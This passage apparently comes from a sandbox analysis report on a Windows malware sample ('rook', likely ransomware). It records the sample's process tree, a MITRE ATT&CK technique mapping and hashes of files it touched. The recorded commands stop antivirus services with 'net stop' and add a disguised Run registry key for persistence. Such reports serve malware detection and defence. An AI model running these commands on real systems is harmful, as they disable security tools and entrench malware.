- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop KAVFSGT /y
  2⤵
  PID:3536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:4048
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop KAVFS /y
  2⤵
  PID:3980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:4020
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfefire /y
  2⤵
  PID:3416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:3952
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe" /f
  2⤵
  PID:3928
- - C:\Windows\system32\reg.exe
    REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-369864705-1975037888-1258798950717927181-12235666362861549471471675021-1452423447"
1⤵
PID:2088

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-418125389-839399930-1062471522-723484227-1781995043-730835590-228209981227278917"
1⤵
PID:3708

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:4036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1948157338-756206185-54593047720887547351235417998-3739288641566640115-1703131327"
1⤵
PID:3704

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1241560022-448594997-9179977881618490013-1329384353-15428588901767938558-1304371611"
1⤵
PID:4032

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1970161573-395306111027292231-11375426462063810051-135263842-1553645657-1958743779"
1⤵
PID:4000

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-45152561942481821-20221042171611399413-19370007631874659655986720670936587917"
1⤵
PID:3520

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1440205754-246901014146960403136540407621416343113167075-1754904585-1933025797"
1⤵
PID:4024

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-557470869-9319387861435078507137682361213633308311748590067-12730580261353180445"
1⤵
PID:3712

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1415318367-114873733647019975-624829213-184190232-1147935619-118104362-1777152117"
1⤵
PID:3636

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "360072734-1048318250-89944768635555856-1472542303-6024894361525272379-1624850861"
1⤵
PID:3936

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9288588361471350755398025053-8175500222002358271-5251283183370341571656686181"
1⤵
PID:3996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2138901613-20701953821444916168-1170988482-14446531771941500228-19351743171484733617"
1⤵
PID:3872

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1383513028-1614229153533019759424626431-13935845371551087651-1050737056-178194357"
1⤵
PID:4016

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-127597221562254525711391042061485128325-14369952121948069921-1362434191187494501"
1⤵
PID:3988

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2120830082716939656-1779680756-48386506-121446779-1153495311-942566808-2043055488"
1⤵
PID:4008

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-136690072820432773601033547640-2129741374497742900-1923686627-5138296641171165422"
1⤵
PID:3444

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "753171880340591899-1854599717-20785480021514902909-1398535061-775165243-542322833"
1⤵
PID:3052

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "656317259-14137975811488173250-10751992332055018028484518509-696608661529714734"
1⤵
PID:3920

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "11813534517422389198664481611060742309-12335594192414180691313418682-1315282156"
1⤵
PID:3616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-517529124-198658071520096758761860411696-1053105899-20596131221539749710-495411302"
1⤵
PID:3592

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:34012

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:34248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab

Filesize
22.8MB

MD5
3cbeef3958cd941c4095f7b680307cd6

SHA1
525e8474bddfaa796b394fa28ad4341922262ac2

SHA256
4ff37fc1d6548baec80395bab3fea42c02072346cae71d575a481b87a97ac967

SHA512
d398bf0a7ae158305e43fd4e7b21ce42056499595243f35d64b1c3790a46f6e9da1152579a2d5baa2a6508dc2c5d3fb57e9551fb82572b250da1bfbb335457d5

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.msi

Filesize
2.9MB

MD5
8687c4cf18e730f512e8cc2d58266580

SHA1
c0501f86b6a6d6842e528aabdd6caf594cb02f98

SHA256
b35decaec5f5a7e5f4c62de7ec75d06b2880423d67df3f55e3fa32c8f008c12c

SHA512
783cacbbada0e6c7a537e81eeb36eddeee16f6905545458c981aa47398eacad5eb2a523b058b3c4c11d85364fd6e6ace9123be135b99bef33903833f8b652e71

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml

Filesize
4KB

MD5
fa5e05fad0158e7cc80759b670a61c79

SHA1
7aa917c5762dc96bbd5adfffc6f7f2d8238c13b8

SHA256
7f97428ba49a60ca84b4d5b3221012f4d8bfee8f8f5a1069e774047f4901a1e5

SHA512
7c3571520d2ce92f4721233ccea8bd12ae048732c69ec47908f8ebd438fb96a4fae147eb1061e10d5405d1e9d00dd07aa61eed9cdfbd80eacea82d8f8c078687

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi

Filesize
23.7MB

MD5
6f33dabb3dfe095a04914fbda5e1eaee

SHA1
03999f57b8f0fde12788106226a28b34d64373e5

SHA256
d94d6abfdceeb173e2099b37c9ba3440c418a0ec2b95a9d83c8ba5c730baaaaa

SHA512
8664e21113612e6293e9865221b919b05d38bab9a3de76a9d0389c45c795fabae541fd313b8c3e31597e66bb89f4a6c4f5be7e30ca1ef410bc9cf568adb88b6f

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml

Filesize
17KB

MD5
5e86df92e193636723e0597ba2296eb0

SHA1
2d79b755a853399fb37b4edf8268067a13d8790a

SHA256
20f5ad2c9882bbe96a4d048a4c7cfbbad0e668641d7efe83d9fe78af707944b6

SHA512
dae75fcf3bcfc8daac2fd65b8993b73fdc1a0a1fc9a13db421754806812254742927898f7410d26faee22a382c2ef2c5fa68d764dee42a5935462036e2c66065

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml

Filesize
31KB

MD5
f2e8ae0f13d5c04c0f926fb6eb9071f9

SHA1
ce341e2aa532527e49bde5f684fa328500c60d34

SHA256
24998ca4250744f9a5f5b0f3793e01767df99aa33ccf7c9cb1d6534dd7c0bd78

SHA512
d2c90008d890afde5aa8e240302c62230309a0430d1a58ffa62edae64ebc5b4be0e865d80088e739d8649e44702875951d291c0be2f97282ba495c2e9289cd79

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\pkeyconfig-office.xrm-ms

Filesize
699KB

MD5
cdd780abde35c6f17c8efdcf96265d2b

SHA1
9701c0690f9b367e3275f090f3b6c2c3e170f363

SHA256
443d86bfc58b1b296d736d03ac422d27f2ab6af2d976f01e9d73c7fa4e4e5db4

SHA512
b2e0ac7aa25172197e29dcdb58f9a50421b265e990f416229f04c0ce5db7886d9731a6289b82175ffe7e85b53b0d632b4d463f11d44fccedb5e1bd3b13c47d88

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelLR.cab

Filesize
16.1MB

MD5
998f572555c492baa0edf3222087fa41

SHA1
2d7996ecec846a7bb883d0ef9dd64d862eab8abd

SHA256
e338f1260fd5b6824453a27005967d2d63100a703d0ca594d00d3bc0b75491dd

SHA512
6978e1965506e5dfd3902839fc847472990b8ecdf24208fcc6e96dc1d42d528f563c4bebec2fcecd95cf428f6a115829b6436366825bc4b4a833402547469b08

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi

Filesize
1.7MB

MD5
d0e0de1bb42fab8b4da544e5e4781ef4

SHA1
c82825a7d3a68ae785dd3198254d7a0add50981a

SHA256
48d9f0c3d30a07e7a9ad615d1aab402d6383e206675a540a5c0c5888f9cec4ba

SHA512
39f645df828d456d3048a66b4469291643b1eec7695ea6f70c12f16eb410ee8923222f2e87c052b8dc4ca9dc5c21cc2f5a323620bef7b22520019fc6e5a317ed

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml

Filesize
1KB

MD5
8f3006b2cf023d97e3dc0fa80efc4d9c

SHA1
2cff767496a6f69dd0c0479da91d83a377839d0c

SHA256
091151d4148ec4046389241bc8bb9374e4f79772281bdd92a32c86a4807b269c

SHA512
de3e582c967d983def79c539a598caf123def789f60ad4101c353311a16f61b90bc75cbdb385a7cee47e60beb786b6cb862a72eca9b14232066a4f47d97d916f

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
2KB

MD5
cc9e40dec7c85914ab79ce89d8aa52f4

SHA1
6bb903c3406d6f605e4a1be6b0899eb7d6f09055

SHA256
12165e97aabfaaf31dfcdcd6ab79717ab5c464b124eade26f7449f0879187f20

SHA512
21778ebabeb406bac0ebd9f3cc7de8b4193b47bed817d98ee8e11e98e06241c789ecd4566c70e668295f945301eebb8c220a2ef6348af8d45cf604e4cde55566

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.msi

Filesize
1.7MB

MD5
c4d51be6e2c648bb93915db355aa80fd

SHA1
55fcf68fe9b2bba0e64bb660dce3106a923e77a9

SHA256
65f674bed2e53567eb791fde631bb57d58efe9082052f1b08774dd2f8104d2d6

SHA512
e24eefc3396d6e59e7bc724eaa07682e61fb069cc81dc14444411b7f3711d1c784591d658c6026c1f67ac45fb6a8cc31b930da69dbd59ab3d7455bd85f138723

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml

Filesize
1KB

MD5
2313282079358244a41952151d33112e

SHA1
9395a632f6c6138caa00991121590cdda1109538

SHA256
5e90d63a2438e92eec12c1e8a6b5265240908d57875a4c319282256f7132625a

SHA512
fe4bd377e3152b71b66a150adef10d7c3194f307ff3e99b5c78ba89b8941410a2ec541bf2129a55731c23e1e52eaf8170c80ab2c83b7e4bf254039c7fb5e561e

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
2KB

MD5
74632691c72343676c7ff7ceaa6452c5

SHA1
800d1f7acdb3f48fc24504d50f400890edf05c5b

SHA256
36c5dbcc81dc66369b2fafb68ed36b40d1bb448f4d2f0d89f0e0f355d033142a

SHA512
6a5a87366d18588bfd5bd8a93f1e1b44e8cdcfb85b321ffeb3745309d8b4b9a795e6ab1e357f362b3c8310786fe1fb1cfbbd77c46df7d46a6bce682bf3170e67

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PubLR.cab

Filesize
9.5MB

MD5
ac2d14578a099d9088202a3c927b127c

SHA1
d7599fab909d95f4c8553bc89aab2eb0d4355717

SHA256
a4c7e8a1b64e2bbfae92d2ae2ebda70dbaecb40e906956e575b4efc7d5501074

SHA512
8655d0bcfdb4c656081351030af000e5d34ac602b065ba67e9c15e4680c89e0c82b1c560bc5c043783a78854da0aed314e9790a55fa5dceb0a8b8dac54e316d3

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.msi

Filesize
1.7MB

MD5
82f72c5449cd379db1608f381b0294db

SHA1
cf421c3fbf1cc9f77698a503e84e0ad9535256c8

SHA256
a421b4af81673321f02d41b5caf5b6a9d506bf297c386256fb69b6645432ac53

SHA512
6d81ac509e4578c089f6d891ea3430300747ea9314e5230799e926ace51076494d766a88a620dc8e5c6c417a2b67507ced5f4f3fa1a863cfd6a01f394cd89b9f

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml

Filesize
1KB

MD5
164e3b268de2d6c989fa2ba824a68b5c

SHA1
8fcbc08fd73febbc707a3d0e5ffd3643e2f204c5

SHA256
89c0c5baf54b23951a4c8cad851c3b585d4a0f8dacca98cb69a351a8c35537f6

SHA512
1eb29bcf958d2eaf197fbe552969b219a7c17c1f982a151af7e2f6a32587a5ebbfd66815d2905b16e6e3d945104664a0803fec78a606bd8a19eb514d8b59dfd7

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
1KB

MD5
cc734481fcd3a8adc4b874e6d541f3d6

SHA1
384caede48c312b2b16914a0081ab1597c35b0e2

SHA256
ac1b9dc110667cd65cdda6147a39d795607c1dc3bff890ec36a46ef81fa05eeb

SHA512
c715959efe04ba773ef910edd79e14870d1549844c07ab585cd67d9fa3e4a5ecac072db24bc765d3ded9da23d998c15a2e4c81f4077e7205d9716334a57fdceb

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlkLR.cab

Filesize
14.1MB

MD5
d51cf049883a138949cf3482ea8da930

SHA1
36a7b60f98b8c81f816f9a3af9c1c4650f962845

SHA256
b6a592e7b26f158a6508fe3fb7d2e6def344e4e06361317781e845adeb24f144

SHA512
9aa1c0a196e799bd8be953ed023fec0d8f272c76e0efe52cb37a25b1e7b88eaeebe9ffb311fb58bac8592bf3b709f2676d2cd65a9b246ed76d21013cd400dbba

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.msi

Filesize
2.0MB

MD5
01625def732a5e78fadec619a4376f5c

SHA1
850b1d3e83e46631f8d0c92d93c8d1ac32ddb5c8

SHA256
ea49975db9468c70c2e4a9b7b15faebc10f5f9e20fa75d3aaee3bf4c315268c4

SHA512
25ae5fad4db59a8df32d33bcf26b0e6e814403a4bb76b71fe32487b43e5450df6ecfac26daa86851fa909cfc6d7ef8e440f4564f937fe7f56d6b7940b17a6846

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml

Filesize
3KB

MD5
97c28656d2c4692da21cd0fd3353d322

SHA1
290789255b74d48b6405c1fa30641f5e6acb3e39

SHA256
9f7272ae0a6153809d3f22ff9599fa141b339bd208a23d2845edc83535d50675

SHA512
448473f318b32a4a6f0b91c4e2e29b91ecf209b524f16be67729890c49e71955efe33f032a9cd09d57e2202d9b8f66c5acf54882d9e91f3e2df5f9637df24278

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
4KB

MD5
f015279bc5de4918dcdb5bbd8d9c3fbe

SHA1
060a8f1a84fafa35dee1a7d60ca2b5bcd8746bcf

SHA256
b24cb29ef1e9d41032cdf8136f9d5a1c0ac74d830f4fe782eaec5680e177ac37

SHA512
5e6b225b6549766555f6bd09b3141f8d5fa91a04c71b38de40abd665b6671b0138cf4cc0f3f9b723d71d82d629cceb78227f1989f7ae652917906646761cf3f1

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
2KB

MD5
1430eb1e9aeec04fd5c5d25ce03b2b52

SHA1
4484ca4c03d49079e7416138624d86b53cdc0a01

SHA256
1fe2eae22c1c86c5b4a9b524b0571feb6545a432b81abc01dbd527f24da80ffc

SHA512
39e9e996a628352235844e39c6c8ef5dd9ad25a9bc8fe282a13badd9b5b4c60732e625596bb1070361f046591fb5b28b23515558a65b4a85b5c698e1908ae729

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordLR.cab

Filesize
41.8MB

MD5
71c4ad8775680090e5174cc38e2617de

SHA1
8f60ebc7732b783adeb81cc745ac2364cf4e5c6f

SHA256
10a6230b2c96c943da3e4a6e437225d2588124da044e2288fbad81b275a45ac6

SHA512
fdd9029966c67751616d6896540bd688a9faba3149692dbd07edd9d36c75e493ee1c29a68b5e6fad747c8fec38177b532c3e1e73f1da1fa2bb89d4146ac7606c

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.msi

Filesize
1.7MB

MD5
612b929b4949121ce227785f0c74a59e

SHA1
b7c048fed9692f5363b12f1697e29960277ce734

SHA256
6762aeb1def41f92792a1b3a78cceb48fc2aa8a5dcde69af4bc9d5460dbc938f

SHA512
1ee7b0c25cb3a32f0a70da105fa425920fce88e8db7d4698e3cde159208a2c1533d5f7396039c943f0ee2146e941b3544bca6b95419f0a70d19f6131ea82fe39

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml

Filesize
2KB

MD5
fe031ecd47c090603cfaf983bf1fdd5e

SHA1
02995489e74fd4bfa848ae58021a512cc3d85f52

SHA256
f99790ddf12272af67a0288d8e1e899309898d94cd81458bb23a25312b9902d6

SHA512
d14f93a6faeeafd60552c4ceb27abc1dca874278ba98098a9c2e04bb71b408f1e4da856487acb8ec186f27912d683cf5cd6b8111b3aba0caa8e4c75245990f0b

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.cab

Filesize
10.4MB

MD5
c6202d9da7d743b7bc52b3c424790f58

SHA1
c6433edc8508f5279398b1aebe92bd1da9fb2e60

SHA256
b329ee17733f9b27043558e5b61e8f3bc7a689512693226937367f309936c26b

SHA512
f11322f681d81aadecbe9fcbac358eac182e01fbaf513f388cdddc6e664f9324fb4746c5e0a3473f4ad2f63e2aee070a9dd855f55f8d97f7f01b2c911f8ad8b2

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.msi

Filesize
641KB

MD5
be409ad9b3921138de541b66ccf394c6

SHA1
4302430fb95049c81d7c66b1f73d664c9fdf9e2d

SHA256
6a023a3114321f315518238047b5a21d8117f2159bfa14ec2d3b725685ee11ec

SHA512
b376d850dfdbfa7bc8a45087ac2bcd7f9379581d0a85770b3c13fa27ea08840d58d2e42a243fd82cc168c39565265a79d9b97b2c39a5c2273a5ea80d9cddb471

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml

Filesize
1KB

MD5
d8a283b30a67cc3e6a1c58b6a9531682

SHA1
44a74f4e129bca40c298ad9267b94146fe57ad7e

SHA256
4a03383cbf8645085a844c0e81f15290356516270424ce5ffc4b03c0d459c003

SHA512
61dbaaf87b547897594d09938d461b8585127eef355718393a88bb38509598d75d8f635198704f8aebb65fd4381a141a4961a28f6d04c61fba67b681f97b8406

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.cab

Filesize
12.6MB

MD5
adce1c29f7811fbb1ff7e78f15030a7b

SHA1
edc03f5e9af4d00c6a35e4cb38b0f1074b4fa4e9

SHA256
308e173ffd08eede338cd1d7894e4d6ac24108e84760c1a5b7ac0cbab4747930

SHA512
309a75b26d7de81aed6225d444b61f3cde457331ad4f5b59beb9b37db3114311ea3677cc1fb2ecf30b1d6d2656eb140d79bd3b96aef068101513b7fecab7abe0

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.msi

Filesize
647KB

MD5
72957ea919d09cc7c084ed7a12aefa2a

SHA1
e543cf519ae3580d25d79705b658e264c0335c14

SHA256
d89e3ebd4bc2977a9b93d64df352b00122758e26d6cbe0a1582bcaf9296584c0

SHA512
35de120cb40466418abda40d442fa0fe986dc668c59b6d4bf2440d7432854e24c9287a0a07fba1416fd7df4c0d5168cb788751effb1f5ea2ccf77909c4175f75

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml

Filesize
1KB

MD5
d1b5aa3b2f297e7b70d4d361d0c577f7

SHA1
3a249120d5e8e69521c9fa6b7f9f1394901c5ed7

SHA256
b711b6fdc2466c4f9281edc2d01bca5d7a63bce7f20969e4e371ea7a200346bc

SHA512
b8ca0e3c4aa61f6759032ca2d6a790734ee172aea718837cb47c2dca504819560b91a9f08a3980d898e6c023da6d1d2d1fcba0113fd2706df450f1e6953dfff4

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.cab

Filesize
19.5MB

MD5
41dd99364050d48ee9b1db6cf7ee6a98

SHA1
e2f6d43ee8530aed2c5db0e7827c42efc2c939b7

SHA256
a25e650071bb1c55a4c9fdcef8eddb0aa3d58490670a5d48970d4b738508f36e

SHA512
0482d0df4fbbda72732bc28c915d697bece68b01fd0943b9431eae6435d539cc0976a9a6d4053b10ea654a2d2768ae539eebb736b102bf62124216f2db663683

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.msi

Filesize
652KB

MD5
02a53fb6547b05f1afbf4962ee2febf0

SHA1
1dcb63570c789a8c03823ec0d33eb995bc413292

SHA256
defb08e8a9549e60b1b2ab1da8c73c9ea4171ec94f372438af08ba22c0864523

SHA512
bd825e00676848bd893a808cc6922d36a7a1b7b4af20c61c4ff0fddd6c25b852905a4e42e97bdc702486cf7657d3a21eace396ed113860a2d5128bb1078f8468

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml

Filesize
1KB

MD5
c4c594fbed492752324309626806ccd0

SHA1
8b8edb0c064672470615eb7b820e57ffb8acf35f

SHA256
2a04a4ac4d821ba385d416a70d678200e51108d4299a3ce530d011c512d4aa79

SHA512
b26a996c7d2fc9e9bfbc8128fc2855ba8c0172a162525f0c3a6b860c96216cb49756575cba638595065b607fc65fd7cccddff71aca5e275a3af1c7683584b8fb

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.msi

Filesize
635KB

MD5
d70ec74fd066d070650441aa940acfb3

SHA1
fa15268f3aeed58cacb427d3e282bee816c6a22e

SHA256
167704aac335ef527556f32608aa662692ba00df325524ba0fa0686a6e475e69

SHA512
0dd8ea686d8811d8f3eb2518bf55b2b2f7678c50f21a349221af7fdadf1d347683e1d2f1e6ad5872aef4ee9b1a451b8a9723f179ca506b8bc6b596208eaf5508

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml

Filesize
1KB

MD5
b09cda2d1474091ae7f2c29b183a0a80

SHA1
3f06a83435b298e048e9677a787fd1006e8082a5

SHA256
9b28282f810fbf7fd98c6e8d856754ab3fd24032724d7711d144c9d172d053fd

SHA512
f1623a72c2b6b11e7c0a557e488370a74619467d5823ea2edcedb7a1e85260d71f431c303c82d401a27a0da49f2e73dfce94296b0ebe574132f89174940e55d9

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
6KB

MD5
794168694310ebeaed70dbe860fe2a79

SHA1
3e3e0f3a417270635eb9442434e6a2066951659d

SHA256
d8b57082411a4116f7622a3b8738fdd00ede034135227e03a953e8b7f097bd05

SHA512
a40c9a9ac24a2d5082fb2930c8308457c6a8ae02cd0e6d60343a71f75769354773b71a7fe08600512ee22caef74d997a9d7043646131a9e05875fa680cb39740

Download Submit
C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfLR.cab

Filesize
15.0MB

MD5
e58c9df0c84079b6961e79c7717bf2eb

SHA1
4e2246c1f63b5a6ab3c16ee940c47558e843a442

SHA256
71f7ff874a04bd3ded6b90fc235e3859a56d401c137b12be8138d2fd670b4ba1

SHA512
c1e8c70799785cd2447fb3ab355dd6ab056eef9def29e5b4f4cb337825fd67b0ef85ab8cb5a5fec57a92e27ac2ce4ab58fb28c0a11d73ea8859409278273d0ed

Download Submit
C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.msi

Filesize
2.3MB

MD5
5565b40488918cec0a4831f5bee6e56c

SHA1
d08c86d3535a100b2c15fc273aea544e9f77c4d1

SHA256
506f7a9807388a160bfeb76edbe963684aaab757872cfdb5fbf39e24fcd856b2

SHA512
df12c3c02210d4c1caa69958a8e212efb1e96f50678fa87fef153905b644199b54d26812a20c4bfd7bf3b40bdee6be1610c292b3761f126a192b9ea55a0389ed

Download Submit
C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata

Filesize
754B

MD5
e1e7628132755336e65ad78dfdc40cd1

SHA1
249160a97b97cab226dce340fb5cadafa24ee26f

SHA256
bc96700a57e30f7346a2c3c68888ed8d508e883f4d47907b3ae6ac37d53baf70

SHA512
03f3c830e6b41d0c32beb62c5dae4931506b131b94e14ec6d12ee29070b7de9e65c570a958cf82f0e57e7d2e7acdc4b766ff27577d0011241dc38b91f4600222

Download Submit
C:\ProgramData\Adobe\Updater6\AdobeESDGlobalApps.xml

Filesize
562B

MD5
8313dcfc04cdcc2b5b9526328c0c66b3

SHA1
b087e6561a08ec3917c83d7825e9551a8a640440

SHA256
635d080aaac9462d0cf9979417517faa71628ba23ee7a2684bb456c428d499cc

SHA512
3c7866f7f5e25b9b70378bfff4b1d0e54f28f6fccabd018679cb78e9b26e5ab1b093aa1153a0b6a44a4aa576f08219b31b6d6b6a0783098c7d9c5e2c6a8beb32

Download Submit
C:\ProgramData\Microsoft Help\Hx.hxn

Filesize
674B

MD5
2f638332c29e067d0cbb2e5f3e6d0b31

SHA1
39ca61872c690f71b0f1d7dcc728e0bf2897ed9c

SHA256
0f28e7aeccbb6df1da6025b7bba5ee3dd6bb4818621f5fa8848cc8777cf9d4b4

SHA512
e440b0e328bdcc0215c8b56b3dc22bc0458f37b290513ab16e99484cea2534e319b0239e6cacb473ece8156efbb7b097f2db658a5d363939a3698280a255550a

Download Submit
C:\ProgramData\Microsoft Help\Hx_1033_MKWD_K.HxW

Filesize
13KB

MD5
b477c42278f7ec1ad193288505645689

SHA1
a2b90e40d12cd28a199256e8b926db727f7ff22c

SHA256
1d4d9120088bcb4978d696e4b3e1632a169131bf39b961bc516356e36b828c51

SHA512
a9a5380f14600234ba8e1e5f65218cf36668d06853e05e868b1057f2c96107226386cc1947030ee4edc081502e7156776be9c74adb9e5b28c0c691b1f37db00b

Download Submit
C:\ProgramData\Microsoft Help\Hx_1033_MKWD_NamedURL.HxW

Filesize
13KB

MD5
df2487063f4a6b896dcc62a3d3c33db0

SHA1
501d6b86da1d93f24f416240f4c76e270b98865f

SHA256
405cadf6796d67f18f26695e6f615a36817d75593ff67623b8f13db0d32a9b6c

SHA512
2e41131d47e16433509fe1e1e9b494d32d0342be9cad4a63861087ec3db8f69783f2539dd806442fbb86873d0e6b3826befafabdd05fa15714e0c3c26717ee2d

Download Submit
C:\ProgramData\Microsoft Help\Hx_1033_MTOC_Hx.HxH

Filesize
10KB

MD5
da5bc0a2407df90de8ba8eb79e0505c1

SHA1
4d7e02e47734c071b59643c89fcea5086dd92586

SHA256
76ca675d941865d922a370416dc5ff3d447dc366aa82a09f3b211683b7b0fb5d

SHA512
4efff6c0e3bf94bb6377835c35cd44ae1df153a6c50924b95a2758921c29e7a1f6e62d853c0cb03208c344cc5cb24fdbca4a91a319252e281873c6dc32fc1779

Download Submit
C:\ProgramData\Microsoft Help\Hx_1033_MValidator.HxD

Filesize
9KB

MD5
12656f5bdad821a206d7330c403b248e

SHA1
9386b2c6542e7580ac3b92443679c6164b228d7f

SHA256
e0056faf659e7521d3320c0b554a388d8c4348cd6fae43829b9bfeddf6dce887

SHA512
